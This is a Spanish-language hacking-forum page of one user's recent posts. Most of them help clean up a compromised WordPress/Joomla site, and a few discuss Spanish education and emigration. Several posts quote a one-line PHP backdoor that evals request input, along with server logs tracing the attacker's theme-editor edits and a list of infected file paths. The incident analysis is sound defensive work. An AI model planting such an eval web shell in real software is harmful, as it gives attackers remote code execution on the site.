elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 292
1  Seguridad Informática / Seguridad / Re: Los sistemas de gestión de vuelo, ¿podrían ser vulnerables? en: Hoy a las 21:49
https://www.youtube.com/watch?v=pbgeLRvjirI

Saludos
2  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 19:31
Citar
(si es un customlog).

Yo creo que es un link, porque cuando estuve en el FTP, le cambie el nombre para ver si generaba mas errores y no tener que descargar los 30MB.. y seguía rellenando el mismo archivo aunque tuviese nombre distinto xD

Saludos
3  Foros Generales / Foro Libre / Re: La educación en España es una estafa en: Hoy a las 18:00
Bueno, el trabajo es trabajo, tienes razón... Pero si has perdido tantos años estudiando algo que probablemente no vayas a trabajar en tu vida.. ¿ es un poco inútil estudiar no ? Para eso, termino la obligatoria y me busco la vida.. y no hace falta ni universidad ni FP ni nada..

Yo creo que por mucho que les gustaría trabajar aquí a esos ingenieros, si España no les da trabajo en lo que les ha enseñado, están casi obligados a irse. De este modo, Alemania y otros países se lo pasan bomba, porque todos invertimos dinero en que esta gente aprenda, y resulta que ellos se van a otro país que ya no tiene que invertir en ellos... solo cobrarles impuestos ...

Saludos

4  Foros Generales / Foro Libre / Re: La educación en España es una estafa en: Hoy a las 17:45
Citar
Se da opciones, no se obliga a la juventud a irse.

En el mismo curso que comente antes, tenia una compañera con master en ese area que se mato trabajando como camarera/cantante de coro y otros para pagarse los estudios.. ahora trabaja en una fabrica de galletas, en la linea quitando las que están mal hechas...

El 89% de los españoles que emigran en busca de empleo cuenta con educación superior
Un estudio del Real Instituto Elcano realizado entre 7.000 personas revela que la mayoría de los emigrantes son hombres y que la profesión que más abunda son los ingenieros.
http://economia.elpais.com/economia/2013/11/07/empleo/1383838356_819951.html

Unos 5000 españoles trabajan sin papeles en el puerto de Tánger en Marruecos
Así, las autoridades españolas calculan que hay a 5000 españoles sin permiso de trabajo en la región, muchos de ellos en puestos cualificados. Mientras que algunos consiguen un puesto regular otros se ven forzados a trabajar en negro.
http://trabajo.excite.es/unos-5000-espanoles-trabajan-sin-papeles-en-el-puerto-de-tanger-en-marruecos-N41781.html

¿ Opciones de que ? ¿ De ser ingeniero y trabajar como peón ?

Saludos
5  Foros Generales / Foro Libre / Re: Juego: Estas baneado por.... en: Hoy a las 15:13
Baneo a @Bryantcore y a @synthesize por no seguir las normas del juego ¬¬

Saludos
6  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 05:32
En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos".

Dile a tu amiga que te lo pague bien xD


Saludos
7  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 05:06
Citar
Debo comentarlas como has hecho tu o lo estás modificando vos?

He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Citar
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos
8  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 05:00
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos
9  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 04:50
Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
  1. <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos
10  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 04:44
En el archivo litermalmente pone esto:

Código:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..

Saludos
11  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 04:40
Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.

Lo que si he podido aislar es el ataque..

Código:
176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"

El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.

Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD

Estoy mirando el archivo ese de joomla.

Saludos
12  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 04:01
Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa...



Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento.

Ahora toca mirar la vulnerabilidad esa..

Saludos
13  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 03:50
He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto:

Código:
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] The Zend Engine API version 220090626 which is installed, is newer.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Contact Zend Technologies at http://www.zend.com/ for a later version of Zend Optimizer.

Raro xD

Saludos
14  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: Hoy a las 03:38
Ya lo mire no tiene ninguno.  Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona.

Saludos
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 292
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines